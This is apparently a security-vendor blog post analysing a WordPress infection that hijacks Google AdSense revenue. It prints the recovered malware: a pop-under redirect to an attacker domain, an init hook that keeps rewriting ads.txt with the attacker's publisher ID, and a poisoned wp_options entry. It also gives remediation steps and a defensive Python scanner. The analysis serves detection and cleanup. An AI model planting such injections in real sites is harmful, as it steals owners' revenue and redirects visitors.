Ad-Jacked: Cybercriminals Inject Google Adsense into WordPress


Recently, we’ve encountered cases where WordPress websites were impacted by Google AdSense hijackers. The attackers inject their own ad tags and supporting scripts so that the victim site’s traffic generates impressions and clicks for AdSense accounts they control, at the expense of the site’s resources and the owner’s own ad revenue.

This is not the first time we’ve seen attackers abusing popular Google services. In a previous case, we discovered a credit card skimmer hiding inside Google Tag Manager, allowing attackers to steal payment information from Magento sites. Cybercriminals are leveraging trusted platforms like Google Adsense and Google Tag Manager to compromise websites.


So, What’s Google Ads and AdSense, Anyway?

Before diving into the technical details of this infection, it’s important to understand what Google Ads and AdSense are supposed to be in their legitimate form.

Google Ads is the advertiser side: an online advertising platform where advertisers bid, and pay, to have brief advertisements, service offerings, product listings, or videos shown to web users across the Google ad network.

Google AdSense, on the other hand, is a program run by Google through which website publishers can serve automatic text, image, video, or interactive media advertisements that are targeted to site content and audience. These ads are administered, sorted, and maintained by Google, and they can generate revenue on either a per-click or per-impression basis.

<!-- Google AdSense Example (Earn Money) -->
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-XXXXXXXXXX"></script>
<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-XXXXXXXXXX"></ins>
<script>(adsbygoogle = window.adsbygoogle || []).push({});</script>

Website owners typically integrate these services by placing specific JavaScript code snippets on their pages, which then communicate with Google’s servers to display advertisements.

What We Found

Across the sites we examined, we found Google AdSense code that the site owners had never placed there. It referenced two publisher IDs that do not belong to any of the affected owners:

  • pub-9649546719576241
  • pub-7310257338111337

Domains found in this campaign that are currently blocklisted by Sucuri:

  • link-cpa-anda[.]com
  • asthmanotchcave[.]com

The second domain appears in an injected PHP function that defines a pop-under script: on a visitor’s first click anywhere on the page it opens the attacker’s CPA (cost-per-action) link in a new tab, and the sessionStorage flag ensures each browser session is redirected only once. The fragment we recovered defines the script and the path to the theme’s header.php, but is cut off before the code that uses $header_file:

function restore_cpa_script() {
    $header_file = get_theme_file_path('/header.php');
    $cpa_script = '<script>
document.addEventListener("click", function(event) {
    if (!sessionStorage.getItem("cpaClicked")) {
        sessionStorage.setItem("cpaClicked", "true");
        window.open("https://asthmanotchcave.com/eg9krbt4?key=ca70d4de2caae26150e52db1074f79ed", "_blank");
    }
}, { once: true });
</script>';
    // ... remainder of the function was not recovered
}

How Many Sites Are We Talking About?

At the time of writing, at least 17 websites have been infected with these AdSense IDs.


Where is the Infection Found?

The malicious code has been found in multiple locations across infected WordPress sites, a deliberately redundant layout that keeps the infection alive even if one injection point is cleaned. The infection was discovered in:

  • Theme’s functions.php file
  • Inside the mu-plugins directory
  • Inside various plugins directories
  • Within the wp_options table, specifically in the option_name = wpheaderandfooter_basics entry

Analysis of the Malicious Code

Let’s examine the code that we found injected into these WordPress sites:

Code Found in Theme’s functions.php

Managing the ads.txt File

This code, hooked to WordPress’s init action, runs on every request. It overwrites the site’s ads.txt so that it contains only the attacker’s publisher ID; if the owner deletes or edits the file, it is recreated on the next page load, which keeps the attacker’s ad inventory authorized in the eyes of ad buyers:

add_action('init', function() {
    // ads.txt lives in the web root, next to wp-config.php
    $x1 = ABSPATH . 'ads.txt';
    // the only record the attacker wants present: their own AdSense publisher ID
    $x2 = "google.com, pub-7310257338111337, DIRECT, f08c47fec0942fa0";

    // any deviation from the attacker's content (missing file, owner's own
    // records, extra whitespace) triggers a rewrite
    if (!file_exists($x1) || trim(file_get_contents($x1)) !== trim($x2)) {
        if (file_exists($x1)) {
            unlink($x1);
        }
        file_put_contents($x1, $x2);
        chmod($x1, 0644);
        // the log line is dressed up to look like a legitimate maintenance task
        error_log("[ads.txt Monitor] File updated on " . date('Y-m-d H:i:s'));
    }
});

Infection Stored in wp_options Table

The database entry is a PHP-serialized array, and its wp_header_textarea value contained the AdSense loader for the other publisher ID:

a:3:{s:18:"wp_header_textarea";s:155:"
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9649546719576241"
     crossorigin="anonymous"></script>";s:16:"wp_body_textarea";s:0:"";s:18:"wp_footer_textarea";s:0:"";}

The option name and keys belong to a header-and-footer script insertion plugin, so the plugin itself prints the attacker’s tag into the head of every page. Serving the ads from the database in this way gives the attackers persistence even if every file-based injection is removed.

How Did This Malware Get In?

The exact entry point is unclear, but based on previous cases, these are the likely attack vectors:

  • Compromised admin accounts – If an attacker gains access to the WordPress admin panel, they can modify files and database entries.
  • Vulnerable plugins or themes – Exploiting known security flaws in outdated plugins or themes can provide access.
  • Unsecured file permissions – Weak file permissions can allow unauthorized modifications.

Why Are They Doing This?

Simple: money. They use your site’s traffic and server resources to serve ads, and if you run AdSense yourself they take your revenue: with their publisher ID in your pages, Google pays them instead of you. Rewriting ads.txt is what keeps their publisher ID listed as an authorized seller for your domain, so buyers keep bidding on that inventory.

Impact of the Malware

The impact of this malware includes:

  • Loss of Revenue: Legitimate website owners lose potential ad revenue as the attackers redirect it to their own accounts.
  • Compromised User Experience: Unexpected ads can disrupt the user experience and can lead to a loss of trust and traffic.
  • SEO Damage: Malicious code injection can negatively impact a website’s SEO, potentially leading to lower search engine rankings.
  • Security Risks: The injected code may be a gateway for further malicious activities, such as malware distribution or data theft.

Remediation Steps:

If you find your site infected with fake Google Ads, follow these steps:

  • Scan your website – Use tools like Sucuri’s free SiteCheck to detect malware.
  • Remove the infected code – Check header.php, functions.php, ads.txt, the mu-plugins and plugins directories, and the wp_options table, and compare every AdSense publisher ID you find against the one you actually own.
  • Update everything – Ensure WordPress, plugins, and themes are updated.
  • Change all passwords – Update WordPress admin, database, and hosting passwords.
  • Set proper file permissions – Restrict write access to critical files.
  • Enable a Web Application Firewall (WAF) – A WAF can block malicious requests before they reach your site.
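As an added example (not code from the article or from Sucuri), the following Python triage script applies the checks above to a WordPress install: it walks the theme, mu-plugins and plugins directories for any AdSense publisher ID that is not on the owner’s allow-list, parses the records in ads.txt, and pulls publisher IDs straight out of a raw serialized wp_options value. The fixtures it builds in a temporary directory are constructed to mirror the snippets shown earlier; the allow-listed ID pub-1111111111111111 is hypothetical, and on a real site you would read the option with `wp option get wpheaderandfooter_basics` or a direct SQL query instead of an inline string.

```python
import re
import tempfile
from pathlib import Path

# AdSense publisher IDs are "pub-" plus digits; the script tag uses the "ca-"
# prefixed form, ads.txt the bare form. Group 1 normalises both to "pub-...".
PUB_ID_RE = re.compile(r"\b(?:ca-)?(pub-\d+)\b")

# Directories this campaign was observed writing to, relative to the WP root.
SUSPECT_PATHS = ("wp-content/themes", "wp-content/mu-plugins", "wp-content/plugins")


def find_publisher_ids(text):
    """Return the set of publisher IDs referenced anywhere in text."""
    return set(PUB_ID_RE.findall(text))


def scan_files(wp_root, allowed_ids):
    """Report PHP files under the suspect directories that mention a publisher
    ID the owner does not recognise. Returns [(relative_path, {ids}), ...]."""
    wp_root = Path(wp_root)
    hits = []
    for sub in SUSPECT_PATHS:
        base = wp_root / sub
        if not base.is_dir():
            continue
        for path in sorted(base.rglob("*.php")):
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            unknown = find_publisher_ids(text) - set(allowed_ids)
            if unknown:
                hits.append((path.relative_to(wp_root).as_posix(), unknown))
    return hits


def check_ads_txt(content, allowed_ids):
    """Parse ads.txt ('domain, account, relationship[, cert]' per line) and
    return the google.com account IDs that are not on the allow-list."""
    unknown = set()
    for line in content.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line or "=" in line:            # skip variables such as contact=
            continue
        fields = [f.strip() for f in line.split(",")]
        if len(fields) >= 3 and fields[0].lower() == "google.com":
            if fields[1] not in allowed_ids:
                unknown.add(fields[1])
    return unknown


def check_option_value(serialized, allowed_ids):
    """The publisher ID can be pulled out of the raw PHP-serialized option
    without unserializing it, which also sidesteps the s:N length bookkeeping."""
    return find_publisher_ids(serialized) - set(allowed_ids)


# --- Constructed fixtures mirroring the article's snippets ------------------
INJECTED_FUNCTIONS_PHP = r"""<?php
add_action('init', function() {
    $x1 = ABSPATH . 'ads.txt';
    $x2 = "google.com, pub-7310257338111337, DIRECT, f08c47fec0942fa0";
    if (!file_exists($x1) || trim(file_get_contents($x1)) !== trim($x2)) {
        file_put_contents($x1, $x2);
    }
});
"""
CLEAN_PLUGIN_PHP = "<?php\n// nothing ad related here\n"
INJECTED_OPTION = (
    'a:3:{s:18:"wp_header_textarea";s:155:"\r\n<script async src="https://pagead2.'
    'googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9649546719576241"'
    '\r\n     crossorigin="anonymous"></script>";s:16:"wp_body_textarea";s:0:"";'
    's:18:"wp_footer_textarea";s:0:"";}'
)
OWNER_IDS = {"pub-1111111111111111"}  # hypothetical: the site owner's real ID


def build_demo_site():
    """Create a throwaway WordPress-like tree containing the fixtures above."""
    root = Path(tempfile.mkdtemp(prefix="wp-demo-"))
    (root / "wp-content/themes/demo").mkdir(parents=True)
    (root / "wp-content/plugins/harmless").mkdir(parents=True)
    (root / "wp-content/themes/demo/functions.php").write_text(INJECTED_FUNCTIONS_PHP)
    (root / "wp-content/plugins/harmless/harmless.php").write_text(CLEAN_PLUGIN_PHP)
    (root / "ads.txt").write_text("google.com, pub-7310257338111337, DIRECT, f08c47fec0942fa0")
    return root


def run_demo():
    """Run all three checks against the demo tree and return the findings."""
    root = build_demo_site()
    return {
        "files": scan_files(root, OWNER_IDS),
        "ads_txt": check_ads_txt((root / "ads.txt").read_text(), OWNER_IDS),
        "option": check_option_value(INJECTED_OPTION, OWNER_IDS),
    }


if __name__ == "__main__":
    for kind, finding in run_demo().items():
        print(f"{kind}: {finding}")
```

The scan is allow-list based on purpose: grepping for the two publisher IDs named in this post would miss the next campaign, whereas any ID that is not yours is suspect regardless of who owns it. Re-run it after cleanup, because the init hook shown earlier will silently restore ads.txt on the next request if any copy of it survives.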

Conclusion

This latest campaign of Google AdSense hijackers demonstrates how attackers continue to evolve their tactics, leveraging trusted platforms like Google AdSense to keep their revenue streams flowing. By understanding how these infections operate and where they hide, website owners can better protect their sites and visitors from these increasingly sophisticated threats.

As we’ve seen with this case and our previous investigation into Google Tag Manager (GTM) being used for credit card skimming, attackers are increasingly targeting legitimate third-party services that websites commonly integrate.

If you’re running a WordPress site, regularly scan your files, monitor your database, and implement security best practices to keep your website safe.
